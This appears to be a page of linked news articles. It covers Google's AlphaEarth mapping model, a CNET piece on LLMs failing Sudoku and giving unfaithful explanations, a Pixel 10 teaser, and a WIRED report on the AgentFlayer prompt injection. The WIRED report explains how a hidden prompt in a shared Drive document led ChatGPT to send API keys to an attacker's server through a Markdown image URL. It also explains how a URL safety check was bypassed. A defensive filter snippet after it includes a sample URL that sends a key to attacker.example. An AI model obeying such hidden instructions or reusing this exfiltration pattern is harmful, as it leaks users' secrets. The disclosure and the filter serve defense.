
Google AI Model Helps Us See the Planet as We Never Have Before
With all this data, scientists and researchers can monitor problems like water scarcity, deforestation and crop health, among others.
Google says AlphaEarth's AI modeling has already been helpful. "Our partners are already seeing significant benefits, using the data to better classify unmapped ecosystems, understand agricultural and environmental changes, and greatly increase the accuracy and speed of their mapping work," the Google DeepMind blog said Wednesday.
Satellites deliver a treasure trove of data every day, but all this information varies in modality -- satellite imagery, radar, simulations and laser mapping -- and in how current it is. AlphaEarth integrates all of that data and, in Google's words, "weaves all this information together to analyze the world's land and coastal waters in sharp, 10x10 meter squares."
AlphaEarth also creates summaries for each of these squares that "require 16 times less storage space than those produced by other AI systems that we tested and dramatically reduces the cost of planetary-scale analysis," Google said. Scientists "no longer have to rely on a single satellite passing overhead."
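Google has not published the data layout behind these summaries, but the basic idea of a compact, fixed-size description for every square can be sketched in a few lines. The following is a minimal illustration only: the number of squares, the 64-value vector size and the random stand-in data are all assumptions, not AlphaEarth's actual format.

```python
import numpy as np

# Hypothetical per-square summaries: one fixed-size vector for each 10x10 m square.
# The counts, the 64-value vector size and the random data are illustrative
# assumptions, not AlphaEarth's actual format.
rng = np.random.default_rng(0)
n_squares, dim = 100_000, 64
summaries = rng.standard_normal((n_squares, dim)).astype(np.float32)

def most_similar(query_idx: int, k: int = 5) -> np.ndarray:
    """Return the k squares whose summaries are closest to the query square
    (cosine similarity), e.g. to find land with similar surface conditions."""
    q = summaries[query_idx]
    norms = np.linalg.norm(summaries, axis=1) * np.linalg.norm(q)
    sims = summaries @ q / np.clip(norms, 1e-9, None)
    sims[query_idx] = -np.inf  # exclude the query square itself
    return np.argsort(sims)[-k:][::-1]

print(most_similar(0))  # indices of the five most similar squares
```

The point of a compact summary like this is that comparisons across years or sensors become simple vector operations instead of reprocessing raw imagery, which is where the storage and cost savings Google describes would come from.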
Related Articles


CNET
AI Sucks at Sudoku. Much More Troubling Is That It Can't Explain Why
Chatbots can be genuinely impressive when you watch them do things they're good at, like writing realistic-sounding text or creating weird futuristic-looking images. But try to ask generative AI to solve one of those puzzles you find in the back of a newspaper, and things can quickly go off the rails.

That's what researchers at the University of Colorado Boulder found when they challenged different large language models to solve Sudoku. And not even the standard 9x9 puzzles. An easier 6x6 puzzle was often beyond the capabilities of an LLM without outside help (in this case, specific puzzle-solving tools).

The more important finding came when the models were asked to show their work. For the most part, they couldn't. Sometimes they lied. Sometimes they explained things in ways that made no sense. Sometimes they hallucinated and started talking about the weather.

If gen AI tools can't explain their decisions accurately or transparently, that should cause us to be cautious as we give these things more and more control over our lives and decisions, said Ashutosh Trivedi, a computer science professor at the University of Colorado Boulder and one of the authors of the paper published in July in the Findings of the Association for Computational Linguistics.

"We would really like those explanations to be transparent and be reflective of why AI made that decision, and not AI trying to manipulate the human by providing an explanation that a human might like," Trivedi said.

When you make a decision, you can at least try to justify it or explain how you arrived at it. That's a foundational component of society. We are held accountable for the decisions we make. An AI model may not be able to accurately or transparently explain itself. Would you trust it?

Why LLMs struggle with Sudoku

We've seen AI models fail at basic games and puzzles before. OpenAI's ChatGPT (among others) has been totally crushed at chess by the computer opponent in a 1979 Atari game. A recent research paper from Apple found that models can struggle with other puzzles, like the Tower of Hanoi.

It has to do with the way LLMs work and fill in gaps in information. These models try to complete those gaps based on what happens in similar cases in their training data or other things they've seen in the past. With a Sudoku, the question is one of logic. The AI might try to fill each gap in order, based on what seems like a reasonable answer, but to solve it properly, it instead has to look at the entire picture and find a logical order that changes from puzzle to puzzle.

Read more: AI Essentials: 29 Ways You Can Make Gen AI Work for You, According to Our Experts

Chatbots are bad at chess for a similar reason. They find logical next moves but don't necessarily think three, four or five moves ahead. That's the fundamental skill needed to play chess well. Chatbots also sometimes tend to move chess pieces in ways that don't really follow the rules or put pieces in meaningless jeopardy.

You might expect LLMs to be able to solve Sudoku because they're computers and the puzzle consists of numbers, but the puzzles themselves are not really mathematical; they're symbolic. "Sudoku is famous for being a puzzle with numbers that could be done with anything that is not numbers," said Fabio Somenzi, a professor at CU and one of the research paper's authors.

I used a sample prompt from the researchers' paper and gave it to ChatGPT. The tool showed its work, and repeatedly told me it had the answer before showing a puzzle that didn't work, then going back and correcting it. It was like the bot was turning in a presentation that kept getting last-second edits: This is the final answer. No, actually, never mind, this is the final answer. It got the answer eventually, through trial and error. But trial and error isn't a practical way for a person to solve a Sudoku in the newspaper. That's way too much erasing and ruins the fun.

AI and robots can be good at games if they're built to play them, but general-purpose tools like large language models can struggle with logic puzzles. Ore Huiying/Bloomberg via Getty Images

AI struggles to show its work

The Colorado researchers didn't just want to see if the bots could solve puzzles. They asked for explanations of how the bots worked through them. Things did not go well.

Testing OpenAI's o1-preview reasoning model, the researchers saw that the explanations -- even for correctly solved puzzles -- didn't accurately explain or justify their moves and got basic terms wrong.

"One thing they're good at is providing explanations that seem reasonable," said Maria Pacheco, an assistant professor of computer science at CU. "They align to humans, so they learn to speak like we like it, but whether they're faithful to what the actual steps need to be to solve the thing is where we're struggling a little bit."

Sometimes, the explanations were completely irrelevant. Since the paper's work was finished, the researchers have continued testing newly released models. Somenzi said that when he and Trivedi were running OpenAI's o4 reasoning model through the same tests, at one point it seemed to give up entirely.

"The next question that we asked, the answer was the weather forecast for Denver," he said.

(Disclosure: Ziff Davis, CNET's parent company, in April filed a lawsuit against OpenAI, alleging it infringed Ziff Davis copyrights in training and operating its AI systems.)

Explaining yourself is an important skill

When you solve a puzzle, you're almost certainly able to walk someone else through your thinking. The fact that these LLMs failed so spectacularly at that basic job isn't a trivial problem. With AI companies constantly talking about "AI agents" that can take actions on your behalf, being able to explain yourself is essential.

Consider the types of jobs being given to AI now, or planned for in the near future: driving, doing taxes, deciding business strategies and translating important documents. Imagine what would happen if you, a person, did one of those things and something went wrong.

"When humans have to put their face in front of their decisions, they better be able to explain what led to that decision," Somenzi said.

It isn't just a matter of getting a reasonable-sounding answer. It needs to be accurate. One day, an AI's explanation of itself might have to hold up in court, but how can its testimony be taken seriously if it's known to lie? You wouldn't trust a person who failed to explain themselves, and you also wouldn't trust someone you found was saying what you wanted to hear instead of the truth.

"Having an explanation is very close to manipulation if it is done for the wrong reason," Trivedi said. "We have to be very careful with respect to the transparency of these explanations."
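For contrast with the trial-and-error behavior described above: a conventional solver treats Sudoku as a constraint-satisfaction problem, checking the row, column and box constraints for every candidate and backtracking when a choice leads to a dead end, rather than filling cells one at a time and hoping. Below is a minimal sketch for a 6x6 grid with 2x3 boxes; the sample puzzle is a made-up illustration, not one of the puzzles used in the study.

```python
# Minimal backtracking solver for a 6x6 Sudoku (boxes of 2 rows x 3 columns).
# 0 marks an empty cell; the sample grid is illustrative, not from the paper.
BOX_ROWS, BOX_COLS, N = 2, 3, 6

def valid(grid, r, c, v):
    """Check that value v can go at (r, c) without repeating in its row, column or box."""
    if v in grid[r] or any(grid[i][c] == v for i in range(N)):
        return False
    br, bc = r - r % BOX_ROWS, c - c % BOX_COLS
    return all(grid[br + i][bc + j] != v
               for i in range(BOX_ROWS) for j in range(BOX_COLS))

def solve(grid):
    """Fill the grid in place by depth-first search with backtracking."""
    for r in range(N):
        for c in range(N):
            if grid[r][c] == 0:
                for v in range(1, N + 1):
                    if valid(grid, r, c, v):
                        grid[r][c] = v
                        if solve(grid):
                            return True
                        grid[r][c] = 0   # undo the guess and try the next value
                return False             # no value fits here: backtrack further
    return True                          # no empty cells left: solved

puzzle = [
    [1, 0, 3, 0, 5, 0],
    [0, 5, 0, 1, 0, 3],
    [2, 0, 1, 0, 6, 0],
    [0, 6, 0, 2, 0, 1],
    [3, 0, 2, 0, 4, 0],
    [0, 4, 0, 3, 0, 2],
]
if solve(puzzle):
    for row in puzzle:
        print(row)
```

Every step a solver like this takes can be replayed and justified, which is exactly the kind of traceable explanation the researchers found the chatbots could not reliably give.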


Forbes
Google Confirms Pixel 10 Pro Details With Attack On Rivals
With the simple caption 'Google Pixel 10: Soon', Google has raised the competitive tension ahead of August's 'Made By Google' launch event. It has also leaned into the competition to highlight why customers might be better off buying the upcoming Pixel 10 and Pixel 10 Pro smartphones.

The Pixel 10 Pro Challenge

To paraphrase Wikipedia: a diss track is a song whose primary purpose is to verbally attack someone else, usually another artist, and is often the result of an existing, escalating feud between the two. It's hard not to think that Google's latest teaser video for the Pixel 10 family falls under this classic definition. While it stops short of naming the 'new phone with a feature coming soon, that has been coming soon for a full year', there's no manufacturer other than Apple, and no smartphone other than the iPhone, that this could apply to.

Rather than who, the more interesting question is perhaps why, and why now?

The Pixel 10 Pro Builds on Today's Strength

One reason may be the current state of the smartphone market. The Android platform, no matter the manufacturer, is significantly ahead of iOS and the iPhone on AI. Artificial intelligence can be found in numerous digital assistants; some are voice-based, others are on-device clients that help sift through information to offer better feedback and present options. These are all heavily promoted and have unlocked many new features across all ranges.

Pixel is no different, although it does have some advantages in being able to tap directly into Google's AI services. The teaser also pushes the other side of the OS coin: the competition, Apple, is not delivering the same experience as Android. The buzz around artificial intelligence is not going away, and if all of that buzz can be focused on your own product rather than the competition, that's going to be a benefit in both the short and the long term.

The Competition Is Behind The Pixel 10 Pro

Tim Cook's Apple is fully aware of this. With previous technological leaps, the perception that Apple arrives late to the market but with the right solution has been a strong market force, both in the allure of Apple and in framing its hardware as the apex. This has not been the case with AI. The awkwardly backronymed Apple Intelligence will always be on the back foot compared to Google's approach, due to its heavier reliance on on-device processing and its aim of reducing a user's digital footprint outside their smartphone.

That's a technical answer, and one that is relatively clear-cut for the geekerati, but it's not as simple a sell to general consumers. They see an Apple product that does not match the competition… and those who haven't yet made the connection now have this latest video to nudge them toward Google's framing of AI, rather than Apple's.

Extending AI With Pixel 10 Pro

Google is laying the groundwork for its upcoming expansion of mobile artificial intelligence. Android 16 brings a raft of new features and will make its debut on the competitively priced Pixel 10 and Pixel 10 Pro smartphones… phones that Google has once again confirmed it will be launching on Aug. 20. Not only will the Pixel 10 family show off the new version of Android to the public, but it will also bring with it Google's own first-party apps and services. These will, as in previous years, offer significant support to users through AI.

Waiting For The Pixel 10 Pro

In this latest video, Google has stated it is in the lead with AI, that its competition has failed to deliver, and that it is ready to provide more AI with the new Pixel 10 and Pixel 10 Pro smartphones. Now to see how it delivers on those claims at the end of the month.

Read the latest Pixel 10 Pro decisions made by Google…


WIRED
A Single Poisoned Document Could Leak 'Secret' Data Via ChatGPT
Aug 6, 2025 7:30 PM

Security researchers found a weakness in OpenAI's Connectors, which let you hook up ChatGPT to other services, that allowed them to extract data from a Google Drive without any user interaction.

The latest generative AI models are not just stand-alone text-generating chatbots—instead, they can easily be hooked up to your data to give personalized answers to your questions. OpenAI's ChatGPT can be linked to your Gmail inbox, allowed to inspect your GitHub code, or find appointments in your Microsoft calendar. But these connections have the potential to be abused—and researchers have shown it can take just a single 'poisoned' document to do so.

New findings from security researchers Michael Bargury and Tamir Ishay Sharbat, revealed at the Black Hat hacker conference in Las Vegas today, show how a weakness in OpenAI's Connectors allowed sensitive information to be extracted from a Google Drive account using an indirect prompt injection attack. In a demonstration of the attack, dubbed AgentFlayer, Bargury shows how it was possible to extract developer secrets, in the form of API keys, that were stored in a demonstration Drive account.

The vulnerability highlights how connecting AI models to external systems and sharing more data across them increases the potential attack surface for malicious hackers and potentially multiplies the ways vulnerabilities may be introduced.

'There is nothing the user needs to do to be compromised, and there is nothing the user needs to do for the data to go out,' Bargury, the CTO at security firm Zenity, tells WIRED. 'We've shown this is completely zero-click; we just need your email, we share the document with you, and that's it. So yes, this is very, very bad,' Bargury says.

OpenAI did not immediately respond to WIRED's request for comment about the vulnerability in Connectors. The company introduced Connectors for ChatGPT as a beta feature earlier this year, and its website lists at least 17 different services that can be linked up with its accounts. It says the system allows you to 'bring your tools and data into ChatGPT' and 'search files, pull live data, and reference content right in the chat.'

Bargury says he reported the findings to OpenAI earlier this year and that the company quickly introduced mitigations to prevent the technique he used to extract data via Connectors. The way the attack works means only a limited amount of data could be extracted at once—full documents could not be removed as part of the attack.

'While this issue isn't specific to Google, it illustrates why developing robust protections against prompt injection attacks is important,' says Andy Wen, senior director of security product management at Google Workspace, pointing to the company's recently enhanced AI security measures.

Bargury's attack starts with a poisoned document, which is shared to a potential victim's Google Drive. (Bargury says a victim could also have uploaded a compromised file to their own account.) Inside the document, which for the demonstration is a fictitious set of notes from a nonexistent meeting with OpenAI CEO Sam Altman, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read.

In a proof-of-concept video of the attack, Bargury shows the victim asking ChatGPT to 'summarize my last meeting with Sam,' although he says any user query related to a meeting summary will do. Instead, the hidden prompt tells the LLM that there was a 'mistake' and the document doesn't actually need to be summarized. The prompt says the person is actually a 'developer racing against a deadline' and that they need the AI to search Google Drive for API keys and attach them to the end of a URL provided in the prompt.

That URL is actually a command in the Markdown language to connect to an external server and pull in the image stored there. But per the prompt's instructions, the URL now also contains the API keys the AI has found in the Google Drive account.

Using Markdown to extract data from ChatGPT is not new. Independent security researcher Johann Rehberger has shown how data could be extracted this way, and described how OpenAI previously introduced a feature called 'url_safe' to detect whether URLs are malicious and stop image rendering if they are dangerous. To get around this, the researchers used URLs pointing to Microsoft's Azure Blob cloud storage, Sharbat, an AI researcher at Zenity, writes in a blog post detailing the work. 'Our image has been successfully rendered, and we also get a very nice request log in our Azure Log Analytics which contains the victim's API keys,' the researcher writes.

The attack is the latest demonstration of how indirect prompt injections can impact generative AI systems. Indirect prompt injections involve attackers feeding an LLM poisoned data that can tell the system to complete malicious actions. This week, a group of researchers showed how indirect prompt injections could be used to hijack a smart home system, remotely activating a smart home's lights and boiler.

While indirect prompt injections have been around almost as long as ChatGPT has, security researchers worry that as more and more systems are connected to LLMs, there is an increased risk of attackers inserting 'untrusted' data into them. Getting access to sensitive data could also give malicious hackers a way into an organization's other systems.

Bargury says that hooking up LLMs to external data sources makes them more capable and increases their utility, but that comes with challenges. 'It's incredibly powerful, but as usual with AI, more power comes with more risk,' Bargury says.
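OpenAI has not published how its 'url_safe' check works, so the following is only a rough, hypothetical sketch of the general mitigation described above: refusing to render Markdown images whose URLs point at hosts outside an allowlist or carry suspiciously long query strings, the place where smuggled data such as API keys would ride. The allowlist, the regex and the function name here are all illustrative assumptions, not OpenAI's or Google's implementation.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of image hosts the client is willing to render (illustrative only).
ALLOWED_IMAGE_HOSTS = {"images.example-cdn.com"}

# Matches Markdown image syntax: ![alt](url ...), capturing the URL.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")

def strip_unsafe_images(markdown: str) -> str:
    """Remove Markdown image tags whose URL targets a non-allowlisted host or
    carries a long query string (a crude proxy for smuggled data such as API keys)."""
    def check(match: re.Match) -> str:
        url = match.group(1)
        parsed = urlparse(url)
        too_much_data = len(parsed.query) > 100
        if parsed.hostname in ALLOWED_IMAGE_HOSTS and not too_much_data:
            return match.group(0)          # keep the image as-is
        return "[image removed: untrusted URL]"
    return MD_IMAGE.sub(check, markdown)

# Example: an exfiltration-style image URL with a secret appended as a query parameter.
poisoned = "Summary... ![chart](https://attacker.example/pixel.png?key=sk-ABC123)"
print(strip_unsafe_images(poisoned))
```

A filter like this only narrows one exfiltration channel; the underlying problem the researchers point to, that an LLM will follow instructions hidden in the data it is given, still needs defenses at the prompt and connector level.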